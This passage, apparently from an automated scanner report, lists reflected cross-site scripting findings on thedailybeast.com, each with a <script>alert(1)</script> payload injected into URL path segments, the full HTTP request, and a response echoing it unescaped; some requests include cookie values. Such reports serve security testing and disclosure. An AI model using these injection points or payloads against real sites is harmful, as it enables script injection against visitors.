User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:58:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/blogs-and-stories/2010-11-128bcd7"><script>alert(1)</script>8ada850f6ff/carnival-cruise-disaster-and-more-cruises-from-hell/full/"/>
...[SNIP]...

1.12. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/daily-beast-merges-with-newsweek-tina-brown-sidney-harman-and-barry-diller-weigh-in-/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /blogs-and-stories/2010-11-12/daily-beast-merges-with-newsweek-tina-brown-sidney-harman-and-barry-diller-weigh-in-/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d09d"><script>alert(1)</script>1d8782345eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs-and-stories5d09d"><script>alert(1)</script>1d8782345eb/2010-11-12/daily-beast-merges-with-newsweek-tina-brown-sidney-harman-and-barry-diller-weigh-in-/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:56:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/blogs-and-stories5d09d"><script>alert(1)</script>1d8782345eb/2010-11-12/daily-beast-merges-with-newsweek-tina-brown-sidney-harman-and-barry-diller-weigh-in-/full/"/>
...[SNIP]...

1.13. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/daily-beast-merges-with-newsweek-tina-brown-sidney-harman-and-barry-diller-weigh-in-/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /blogs-and-stories/2010-11-12/daily-beast-merges-with-newsweek-tina-brown-sidney-harman-and-barry-diller-weigh-in-/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 246b0"><script>alert(1)</script>9177b6d3c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs-and-stories/2010-11-12246b0"><script>alert(1)</script>9177b6d3c1/daily-beast-merges-with-newsweek-tina-brown-sidney-harman-and-barry-diller-weigh-in-/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:58:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/blogs-and-stories/2010-11-12246b0"><script>alert(1)</script>9177b6d3c1/daily-beast-merges-with-newsweek-tina-brown-sidney-harman-and-barry-diller-weigh-in-/full/"/>
...[SNIP]...

1.14. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/frank-sinatra-meets-ava-gardner-james-kaplans-frank-excerpt/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /blogs-and-stories/2010-11-12/frank-sinatra-meets-ava-gardner-james-kaplans-frank-excerpt/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0b3d"><script>alert(1)</script>7793ee983a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs-and-storiese0b3d"><script>alert(1)</script>7793ee983a6/2010-11-12/frank-sinatra-meets-ava-gardner-james-kaplans-frank-excerpt/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:58:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/blogs-and-storiese0b3d"><script>alert(1)</script>7793ee983a6/2010-11-12/frank-sinatra-meets-ava-gardner-james-kaplans-frank-excerpt/full/"/>
...[SNIP]...

1.15. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/frank-sinatra-meets-ava-gardner-james-kaplans-frank-excerpt/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /blogs-and-stories/2010-11-12/frank-sinatra-meets-ava-gardner-james-kaplans-frank-excerpt/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b707b"><script>alert(1)</script>38f741fa3b6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs-and-stories/2010-11-12b707b"><script>alert(1)</script>38f741fa3b6/frank-sinatra-meets-ava-gardner-james-kaplans-frank-excerpt/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:58:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/blogs-and-stories/2010-11-12b707b"><script>alert(1)</script>38f741fa3b6/frank-sinatra-meets-ava-gardner-james-kaplans-frank-excerpt/full/"/>
...[SNIP]...

1.16. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/katy-perry-miley-cyrus-rihanna-and-more-stars-without-pants/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /blogs-and-stories/2010-11-12/katy-perry-miley-cyrus-rihanna-and-more-stars-without-pants/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5175f"><script>alert(1)</script>9021c6098d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs-and-stories5175f"><script>alert(1)</script>9021c6098d8/2010-11-12/katy-perry-miley-cyrus-rihanna-and-more-stars-without-pants/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:58:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/blogs-and-stories5175f"><script>alert(1)</script>9021c6098d8/2010-11-12/katy-perry-miley-cyrus-rihanna-and-more-stars-without-pants/full/"/>
...[SNIP]...

1.17. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/katy-perry-miley-cyrus-rihanna-and-more-stars-without-pants/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /blogs-and-stories/2010-11-12/katy-perry-miley-cyrus-rihanna-and-more-stars-without-pants/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36012"><script>alert(1)</script>5491dc298ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs-and-stories/2010-11-1236012"><script>alert(1)</script>5491dc298ac/katy-perry-miley-cyrus-rihanna-and-more-stars-without-pants/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:58:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/blogs-and-stories/2010-11-1236012"><script>alert(1)</script>5491dc298ac/katy-perry-miley-cyrus-rihanna-and-more-stars-without-pants/full/"/>
...[SNIP]...

1.18. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/november-13-the-week-in-viral-video/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /blogs-and-stories/2010-11-12/november-13-the-week-in-viral-video/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e026"><script>alert(1)</script>6a4621cc101 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs-and-stories1e026"><script>alert(1)</script>6a4621cc101/2010-11-12/november-13-the-week-in-viral-video/?cid=blogunit HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.thedailybeast.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.thedailybeast.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:50:21 GMT
Connection: close
Content-Length: 61650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/blogs-and-stories1e026"><script>alert(1)</script>6a4621cc101/2010-11-12/november-13-the-week-in-viral-video/full/"/>
...[SNIP]...

1.19. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/november-13-the-week-in-viral-video/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /blogs-and-stories/2010-11-12/november-13-the-week-in-viral-video/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77d92"><script>alert(1)</script>96c4c1b7f30 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs-and-stories/2010-11-1277d92"><script>alert(1)</script>96c4c1b7f30/november-13-the-week-in-viral-video/?cid=blogunit HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.thedailybeast.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.thedailybeast.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:50:28 GMT
Connection: close
Content-Length: 61918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/blogs-and-stories/2010-11-1277d92"><script>alert(1)</script>96c4c1b7f30/november-13-the-week-in-viral-video/full/"/>
...[SNIP]...

1.20. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/the-lefts-deficit-outrage/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /blogs-and-stories/2010-11-12/the-lefts-deficit-outrage/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc3a5"><script>alert(1)</script>f69901111d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs-and-storiesfc3a5"><script>alert(1)</script>f69901111d6/2010-11-12/the-lefts-deficit-outrage/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:56:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/blogs-and-storiesfc3a5"><script>alert(1)</script>f69901111d6/2010-11-12/the-lefts-deficit-outrage/full/"/>
...[SNIP]...

1.21. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/the-lefts-deficit-outrage/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /blogs-and-stories/2010-11-12/the-lefts-deficit-outrage/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67650"><script>alert(1)</script>fd243b0d6a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs-and-stories/2010-11-1267650"><script>alert(1)</script>fd243b0d6a7/the-lefts-deficit-outrage/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:58:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/blogs-and-stories/2010-11-1267650"><script>alert(1)</script>fd243b0d6a7/the-lefts-deficit-outrage/full/"/>
...[SNIP]...

1.22. http://www.thedailybeast.com/cheat-sheet/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b74b7"><script>alert(1)</script>c9cc6045e42 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheetb74b7"><script>alert(1)</script>c9cc6045e42/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:05:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheetb74b7"><script>alert(1)</script>c9cc6045e42/"/>
...[SNIP]...

1.23. http://www.thedailybeast.com/cheat-sheet/item/crowds-await-suu-kyis-release/overdue-freedom/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/item/crowds-await-suu-kyis-release/overdue-freedom/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4220"><script>alert(1)</script>ff258c38345 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheetc4220"><script>alert(1)</script>ff258c38345/item/crowds-await-suu-kyis-release/overdue-freedom/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:05:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheetc4220"><script>alert(1)</script>ff258c38345/item/crowds-await-suu-kyis-release/overdue-freedom/"/>
...[SNIP]...

1.24. http://www.thedailybeast.com/cheat-sheet/item/crowds-await-suu-kyis-release/overdue-freedom/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/item/crowds-await-suu-kyis-release/overdue-freedom/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aafa2"><script>alert(1)</script>fae48031cf6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/itemaafa2"><script>alert(1)</script>fae48031cf6/crowds-await-suu-kyis-release/overdue-freedom/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:05:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/itemaafa2"><script>alert(1)</script>fae48031cf6/crowds-await-suu-kyis-release/overdue-freedom/"/>
...[SNIP]...

1.25. http://www.thedailybeast.com/cheat-sheet/item/crowds-await-suu-kyis-release/overdue-freedom/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/item/crowds-await-suu-kyis-release/overdue-freedom/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d710a"><script>alert(1)</script>3397b133924 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/item/crowds-await-suu-kyis-released710a"><script>alert(1)</script>3397b133924/overdue-freedom/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/item/crowds-await-suu-kyis-released710a"><script>alert(1)</script>3397b133924/overdue-freedom/"/>
...[SNIP]...

1.26. http://www.thedailybeast.com/cheat-sheet/item/crowds-await-suu-kyis-release/overdue-freedom/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/item/crowds-await-suu-kyis-release/overdue-freedom/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40aac"><script>alert(1)</script>89bfa104e34 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/item/crowds-await-suu-kyis-release/overdue-freedom40aac"><script>alert(1)</script>89bfa104e34/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/item/crowds-await-suu-kyis-release/overdue-freedom40aac"><script>alert(1)</script>89bfa104e34/"/>
...[SNIP]...

1.27. http://www.thedailybeast.com/cheat-sheet/item/gop-hopefuls-jockey-for-donors/campaign-cash/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/item/gop-hopefuls-jockey-for-donors/campaign-cash/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ad64"><script>alert(1)</script>179a0ffcacf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet7ad64"><script>alert(1)</script>179a0ffcacf/item/gop-hopefuls-jockey-for-donors/campaign-cash/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:05:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58713

